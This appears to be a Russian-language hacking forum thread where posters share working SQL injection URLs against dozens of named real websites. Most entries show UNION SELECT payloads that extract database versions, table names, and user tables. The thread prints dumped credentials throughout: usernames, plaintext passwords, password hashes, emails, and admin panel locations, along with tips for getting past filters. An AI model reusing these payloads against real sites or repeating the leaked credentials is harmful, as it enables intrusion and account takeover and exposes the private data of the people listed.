9to5.org Code: _http://www.9to5.org/action/index.php?story=-1+union+select+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10/* 4.1.21-community-nt:[email protected]:toorg1 www.orionbag.com Code: _http://www.orionbag.com/index.php?story=-1+union+select+1,concat(version(),0x3a,user(),0x3a,database ()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/* 5.0.24A-STANDARD-LOG:[email protected]:ONIONBAG 47 Таблиц: Code: [SIZE=2]CHARACTER_SETS COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS COPA_CHART COPA_TEAMS FFA_AP FFA_ASARC FFA_ASCORE FFA_BLOG FFA_LA FFA_LEAGUE FFA_PLAYER FFA_PSARC FFA_SCORE FFA_SEASON1 MAILLIST ORB_IMAGE ORB_ISSUE ORB_POST ORB_STORY T_BLOG T_IMAGE T_ISSUE T_LINKS T_LINKSRANK T_LINKSRATE T_POST T_STORY T_USER - [COLOR=Yellow]интересная таблица, поля USERID,USERNAME,SP3SHUL,PROFILE,ACTIVATED,EMAIL, MODIFIED,CREATED,TYPE,NAMECHECK,MAILLIST [/COLOR] T_USERCOPY WC_CHART WC_GTOTALS WC_TEAMS WC_VENUE[/SIZE] Смотрим поля таблицы t_user Code: _http://www.orionbag.com/index.php?story=-1+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+INFORMATION_SCHEMA.COLUMNS+where+table_name=char(116,95,117,115,101,114)+limit+1,1/* Смотрим записи таблицы t_user Code: _http://www.orionbag.com/index.php?story=-1+union+select+1,concat(USERID,0x3a,USERNAME,0x3a,SP3SHUL,0x3a,PROFILE,0x3a,ACTIVATED,0x3a,EMAIL,0x3a,MODIFIED,0x3a,CREATED,0x3a,TYPE,0x3a,NAMECHECK,0x3a,MAILLIST),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+t_user+limit+0,1/* Юзер походу один...
RockForLife.org Code: http://www.rockforlife.org/action_tellyourprolifestory.php?storyID=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8/* 5.0.45-log:all_onlinebase:[email protected] Таба login: Code: http://www.rockforlife.org/action_tellyourprolifestory.php?storyID=-1+union+select+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,user,pass,email),0x71),0x71),3,4,5,6,7,8+from+login+limit+0,1/* Интересные поля: Code: user,pass,email Данные: Code: jmanak:0OKg1sSc:[email protected] jbrown:0dbW1NDc19vO:[email protected] dbrandao:l6Scp8vc0eY=:[email protected] ewhittington:yuDd2sbZm5+a:[email protected] peddy:2dLc5g==:[email protected] blogger:2dLc5g==:[email protected] jcatelli:xtvTpJOgmA==:[email protected] mhahnenberg:y9bX083Iyd/O:[email protected] Patrick:3NLV4dfMx9ia:[email protected] owmamahateful:0s7No5KalQ==:[email protected] marysunshine:y87d287I:[email protected] RFLCCCD:t9zM3ZWz3tPO:[email protected] RFL Ventura County:y9zb3Mba2uA=:[email protected] RFL Fayetteville:lZ+fosLVyaGb:[email protected] nflusche:1c7c5ZKZmKE=:[email protected] acatelli:xtvTpJOgmA==:[email protected] tbrock:lp+cptHI2OA=:[email protected] pbrown:lp+cptHI2OA=:[email protected] scarroll:lp+cptHI2OA=:[email protected] kchenault:lp+cptHI2OA=:[email protected] sclark:lp+cptHI2OA=:[email protected] jcournia:lp+cptHI2OA=:[email protected] acrane:1c7c5ZKZmKE=:[email protected] fdaub:lp+cptHI2OA=:[email protected] pdaub:1c7c5ZKZmKE=:[email protected] aflusche:lp+cptHI2OA=:[email protected] mhichborn:1c7c5ZKZmKE=:[email protected] shopping:0dbd5s3M:[email protected] bhorn:1c7c5ZKZmKE=:[email protected] rjohnston:lp+cptHI2OA=:[email protected] skenney:xt7e28/I2A==:[email protected] lrehman:lp+cptHI2OA=:[email protected] jsedlak:1c7c5ZKZmKE=:[email protected] msedlak:lp+cptHI2OA=:[email protected] bseers:1c7c5ZKZmKE=:[email protected] dcurrier:ltrY5MbJxs/i:[email protected] ltignor:ydfdo5OZmg==:[email protected] pnowak:lp+cptHI2OA=:[email protected] Этот сайт - часть от проекта _http://www.all.org (что видно по большинству ящиков!) , на котором тоже есть баги... Кто знает, может они крутятся на одном серваке...
linux.uta.edu Code: http://linux.uta.edu/article.php?pid=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5/* 5.0.22-log:linux:[email protected] scaraye.com Code: http://www.scaraye.com/article.php?rub=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user())/*&sr=49 4.0.16-standard:my37767:[email protected] macmerc.com Code: http://www.macmerc.com/article.php?sid=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12/* 4.1.20-log:macmerc_nuke:[email protected] inthefray.com Code: http://www.inthefray.com/html/article.php?sid=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9/* 5.0.24a-standard-log:mpn_itfmag:[email protected] В табе mpn_users есть такие поля как: Code: name,uname,pass,email,femail,emailpass,user_icq,user_aim,user_yim,user_msnm
HTML: http://www.smithhomework.us/article.php?sid=999+union+select+1,2,concat_ws(0x3a,database(),user(),version()),4,5,6,7,8/* 4.0.27-standard jsmith_peanut@localhost jsmith_website HTML: http://www.prophecies.us/article.php?sid=9999+union+select+1,2,concat_ws(0x3a,database(),user(),version()),4,5,6,7,8/* 4.1.22-max-log [email protected] prophet_site
kino.ru Code: http://kino.ru/cinema.php?id=999+union+select+1,2,3,4,5,6,7/* version() 4.1.22-standard-log ну и срать)) user() u6635_1@localhost database() u6635_1 users ~950-100 в базе Code: http://kino.ru/cinema.php?id=999+union+select+1,2,3,concat(id,%22:%22,login,%22:%22,psswd,%22:%22,email),5,6,7+from+users+limit+0,1000/* часть из них... Code: вид id:login:psswd:email 1:Rattlemouse:purpur:[email protected] 2:smoker:7924439:[email protected] 3:nvo:angel:[email protected] 4:xxx:xxx:[email protected] 5:natasha:12345:[email protected] 6:tarkovsky:1234567:1234567 93:time23:230790:[email protected] 9:igor:140766:[email protected] 10:elvis:4082506:[email protected] 12:stas:130281:[email protected] 66:strippedhyena:reptile:[email protected] 13:Ocsana:310373:[email protected] 14:kirr:777444:[email protected] 15:Nat:111222:[email protected] 16:Yuliko:ju17011977:[email protected] 17:Demetr:809809:[email protected] 18:groza:250276:[email protected] 19:Belka:555444:[email protected] 20:TaN4eS:987654:[email protected] 21:Destiny:03090309:[email protected] 22:horek:453453:[email protected] 23:Crazy:250674:[email protected] 24:Kseka:675675:[email protected] 25:Oksana:999888:[email protected] 26:Legenda:tatkasparco:[email protected] 27:CoolBoy:989898:[email protected] 28:PODvodnik:magistr:[email protected] 29:Andrey:897897:[email protected] 30:Stelfort:89265834267:[email protected] 31:Fedot:fedot128:[email protected] 32:Reaccia:787878:[email protected] 34:Misha:543543:[email protected] 36:Iren:324324:[email protected] 37:Surik:kirus:[email protected] 38:LUMER:67890:[email protected] 39:marusenka:234543:[email protected] 42:Tjema:111222:[email protected] xss Code: http://kino.ru/cinema.php?id=999+union+select+1,"<script>alert()</script>",3,4,5,6,7+from+users+limit+0,1000/* админка http://kino.ru/admin Code: smoker 7924439 сайты на этом сервере (2ip.ru/server) Code: www.freeware.ru www.elephant.ru www.kino.ru www.winceware.ru www.macware.ru www.unixware.ru www.palmware.ru www.download.ware.ru www.sail.ru www.old.freeware.ru www.ware.ru www.priceware.ru www.journey.ru www.inter.su www.hospital.ru www.bakalova.ru www.debil.ru шелл не лил passionfordancing.co.uk Code: http://www.passionfordancing.co.uk/country.php?rID=100+union+select+1,2,3,4,5,6 version() 5.0.54 user() passionforda@localhost database() passionforda Code: http://www.passionfordancing.co.uk/country.php?rID=100+union+select+1,2,concat(adminid,char(58),password),4,5,6+from+tbladmin+limit+0,100-- админка Code: www.passionfordancing.co.uk/admin [email protected]:ki11kenny1970 ни в первом, ни во втором случае доступа к mysql.user не получил=//
www.perfectummobile.com 5.0.26-standard admin:9af41a03da452b8c2549aff071ed22fe:sayqal но пасс не катит cdmadmin:9622f76499e8588addb05838587a8e8f - возможно этот подойдёт - но не расщифровал http://www.perfectummobile.com/admin/admin http://www.perfectummobile.com/admin/phpinfo.php http://www.perfectummobile.com/admin/smarty
www.games.zbeng.net http://games.zbeng.net/game.php?id=-8+union+select+concat(username,char(58),password),2,3,4+from+users+limit+1,10/* Вывод в тайтле http://zbeng.net/admin.php- админка Жаль, что в админке все через ****...(глупый язык=))) ----------------------------------------------------------------------- www.pfl.com.ua http://www.pfl.com.ua/game.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/* Нашел таблу adm В табле adm колонка name
Парочка бразильских ресурсов: http://www.visitadopapa.org.br/pagina.php?id=48+and+1=2+union+all+select+1,concat(user,char(58),password,char(58)),3+from+mysql.user/* http://www.visitadopapa.org.br/admin/ (no comments) root: farofa http://www.midiasemmascara.com.br/editoria.php?id=8+and+1=2+union+select+concat_ws(0x3A,usuario,login,permissao),2+from+db_admusers/* где поля: usuario - логин login - пароль http://www.revistainovacao.uniemp.br/materia.php?id=83+and+1=2+union+select+1,2,3,4,5,6,concat_ws(0x3A,nome,login,senha,ativo),8,9,10,11,12,13,14,15,16,17,18+from+usuario/* http://www.kaxi.com.br/area.php?id=6+and+1=2+union+select+table_name,2,3+from+information_schema.tables+limit+20,1/* Поскольку с бразильским у меня проблемы, а точнее я его совсем не знаю, найти интересную таблицу не удалось, единственное знакомое слово - email ). Хотя наличие "мускула" имеет место.
_http://www.futureplay.org/news.php?id=999+union+select+1,login,3,user_password,5,6,7+from+user/* _http://www.pharm-system.com/index.phtml?page=news&id=-1+union+select+1,2,3,4,5,concat(email,0x3a,password),7,8+from+users/*
www.game-sector.ru http://www.game-sector.ru/game.php?id=973+union+select+1,concat_ws(0x2f,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* 4.1.22/[email protected]/d8242sd5804 ----------------------------------------------------------------------- www.isimulacrum.com http://www.isimulacrum.com/game.php?gid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/* Есть интересные таблы: Log Contributors ----------------------------------------------------------------------- http://www1.redikod.com/www.nordicgameportal.com/game.php?id=-1+union+select+1,2,3,4,concat(username,char(58),pwd),6,7,8,9,10,11,12,13,14,15,16+from+users/* Есть доступ к mysql.user ----------------------------------------------------------------------- http://www.isteoyun.com/game.php?id=-1+union+select+1,concat_ws(0x2f,version(),user(),database()),3,4,5,6,7,8,9,10,11/* 5.0.27/root@localhost/isteoyun
boxing78.ru HTML: http://www.boxing78.ru/?c=-7+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3,4,5,6,7/* USER[email protected] VERSION:4.1.20 DATABASEroBoxSQL mtlaurelbaseball.org HTML: http://www.mtlaurelbaseball.org/team.php?id=1+union+select+concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),1/* USER:mtlaurel_1@localhost VERSION:4.1.22-standard DATABASE:mtlaurel_1
kraspol.ru http://kraspol.ru/news.php?nid=59000+union+select+1,2,3,4,5,6,7,8/* http://vesti-ural.ru/news.php?nid=1064999+union+select+1,2,3,4,concat(id,char(58),name,char(58),email),6,7,8,9,10,11,12,13+from+users+limit+5,60/* version() 4.1.22 user() kraspol@localhost database() wwwkraspolru vesti-ural.ru version() 5.0.33-log user() siteuser@localhost database() vesti_ural путь до скрипта /usr/Internet/WebSRV/news.php, узнал из ошибки мускула. таблицы Code: CHARACTER_SETS COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS apps comments fotoimage fotorep images keywords left_nav_banners left_nav_panel menuitems mitemsect news newscomm newsimag newskeys newsrubr prg_items prg_weeks rubrics sections showapps terms [COLOR=Red]users - колонки id, name, email, пассов не нашел=/[/COLOR] vipusks w_city w_day w_descr w_ekaburg w_nebulosity w_precipitation w_weather w_winddir содержимое users Code: вид ID:name:email 1:Денис:[email protected] 2:MrDekk:[email protected] 3:Имя:E-mail 5:Огнева Татьяна:[email protected] 6:Достовалова Елена Дмитриевна:[email protected] 7:заинтересовавшийся:[email protected] 8:Сергей Трофимов:[email protected] 9:галина:[email protected] 10:Света:[email protected] 11:Ромбик:[email protected] 12:наташа:forest13@ mail.ru 13:Имя Jul:E-mail [email protected] 14:Имя Владимир Александрович:E-mail [email protected] 15:Kotovsk:[email protected] 16:Ирина Сингх:[email protected] 17:Сергей:[email protected] 18:Анна:[email protected] 19:Андрей:[email protected] 20:Алексей:А[email protected] 21:Prorok:[email protected] 22:Дина:[email protected] 23:Имя МаксУля:E-mail [email protected] 24:bdfybwrfz:[email protected] 25:Татьяна:[email protected] 26:константин:mushtandroid87mail.ru 27:Dawn:[email protected] 28:Timothy:[email protected] 29:Jody:[email protected] 30:Александр:[email protected] 31:Дмитрий:[email protected] 32:Антон:[email protected] 33:Марина:[email protected] 34:Николай Сызганов:[email protected] 35:Елена:[email protected] 36:Имя Екатерина:E-mail [email protected] 37:Ольга:[email protected] админка Code: http://vesti-ural.ru/admin лезть туда не пытался tnuva.ru http://www.tnuva.ru/recipes.php?rid=69699+union+select+1,2,3,4,5,6/* B]version()[/B] 5.0.45-community-log user() optionsw_ru01@localhost database() optionsw_ru01 колонки в users Code: online votes addr created city email phone thumb filename lastname firstname uid stjag.ru "+" фильтруется, поэтому я использую "/**/" Code: http://www.stjag.ru/new.php?nid=2944799/**/union/**/select/**/1,2,3,4,5,666,7,8,9,10,11,12,13,14/* смотрим результат в <title></title> Code: http://www.stjag.ru/new.php?nid=2944799/**/union/**/select/**/1,2,3,4,5,concat(version(),char(58),user(),char(58),database()),7,8,9,10,11,12,13,14/* version() 4.1.22 user() dbu_ansimov_1@localhost database() db_ansimov_6
Code: http://ukrfoto.dp.ua/download.php?id=-1+union+select+1,concat(version(),0x3a,user(),0x3a%20%20,database()),3,4,5,6/* 4.1.22-log:ukrfoto@saturn:ukrfoto
www.cri-service.nl 4.1.11-standard::cri_cvcri::cri_cri@localhost Таблицы не искал, может кому будет интересно.
HTML: http://boardpros.net/index.php?menu=forum_catview&catid=9999+union+select+1,2,3,4,5,concat_ws(0x3a,username,upass,uemail),7+from+users/* Code: lepunk:fuckyou:[email protected] poster:runescape:[email protected] owner:owner:[email protected] nyunyu:74225:[email protected] default:degauss:[email protected] davino:4730410672:[email protected] surfville:surfy231:[email protected] kittie:20052005:[email protected] bandaloon:sponge:[email protected] darth wrathchild:sponge:[email protected] WarChiLd3192:123456:[email protected] Janizu99:jjl99:[email protected] HTML: http://vostokmedia.com/news.details.php?id=99999+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15/* 4.1.22-standard-log vostokmedia@localhost vostokmedia HTML: http://www.domkino.spb.ru/description.php?id=9999+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,login,password,email,name),11,12+from+user/* shurik:ahin:[email protected]:Шурик 4.1.21-log [email protected] domkinospbru
www.pcper.com Code: http://www.pcper.com/comments.php?nid=-5058+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6/* 5.0.22:root@localhostCPerspective Code: http://www.pcper.com/comments.php?nid=-5058+union+select+1,2,3,4,concat_ws(0x3a,userid,username,password),6+from+users/* userid: username: password 1:Joe White:0ce6f50fd05a98110c2e1627fd98f164:solaris897 3:Ryan:2f86b8b4254dfba8e6e7cd9fdd7a9d46:QHDn47 6:Jon:46d55792707ba7c7883a0afa30127e06:kokoro12 9:Jeremy:124189dac0291419d7d2c875da0e7199 10:unclebob:dea926d0e46968b53dd6d542dc7a129b:butthaid админка Code: http://www.pcper.com/admin/index.php www.gurufocus.com Code: http://www.gurufocus.com/fairvalue.php?user_id=-27097+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4/* 4.1.22-standard:gurufocu_add@localhost:gurufocu_forum
http://f-forpost.ru/product.asp?id=-1+or+1=@@version-- Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 1) http://f-forpost.ru/product.asp?id=-1+or+1=(select+db_name())-- forpost http://f-forpost.ru/product.asp?id=-1+or+1=(select+system_user)-- sa ---------------------------------------------------------------------------- http://www.coldplace.ru/textmus.php?cd=-1+union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user())/*&song=2&name=&id2=1 4.1.20-lk-log/coldplac/coldplac@localhost -------------------------------------------------------------------------- aprelevka.ru http://www.aprelevka.ru/gallery/index.php?p=image_view&id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,cast(version()+as+binary),cast(database()+as+binary),cast(user()+as+binary)),8,9,10/* 4.1.11/aprelevka/root@localhost http://www.aprelevka.ru/gallery/index.php?p=image_view&id=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,login,password,email),8,9,10+from+users+limit+0,1/* логин/хеш/мейл admin/4f2abf1ca5cfd9d21209d6ee83181f16/[email protected]
HTML: http://www.bsigroup.ru/outgoing/context.php?id=22&this=9999'+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/* 5.0.22 bsigroup_newwww@localhost bsigroup_out таблица _system_user и логины и пароли хешированы вот что достал: login / pass root / 89905f508ebdc32e7eb0c24fdb118305 c13fdb1b736210f38d0d080fc102d822 / gctdlj sergey/ 47e35e5e6ab2f91c765b7865399bf8e2 ba839967c5682a7cbe8f865ace327059 / afc60964559e943a8ba803c18f5de457 3e7a517843ed19a2b058bd7ce723fb49 / 862d10398b0bb1653fe239ca4f9a819a
www.maxygen.com Code: http://www.maxygen.com/newsview.php?listid=-293+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat_ws(0x3a,version(),user(),database()),20,21,22,23/* 4.1.20:[email protected]:maxadmin_sqlstar www.bi-me.com Code: http://www.bi-me.com/main.php?id=-16202+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9/*&t=1&c=33&cg=4 4.1.22-standard:bime_sgadmin@localhost:bime_totalcontent www.ilika.com Code: http://www.ilika.com/main.php?id=-7+union+select+1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database()),0x71),0x71)/* 4.1.18-standard:ilikaadm_www@localhost:ilikaadm_www www.swedishclub.com Code: http://www.swedishclub.com/main.php?id=-113+union+select+1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database()),0x71),0x71),4,5,6,7/*&menuid=52 4.1.18-nt:root@localhost:content www.igp.pt Code: http://www.igp.pt/main.php?Id=-17+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9/*&Lingua=PT 4.0.14-STANDARD:JAFONSO@OCTOPUS:WOF
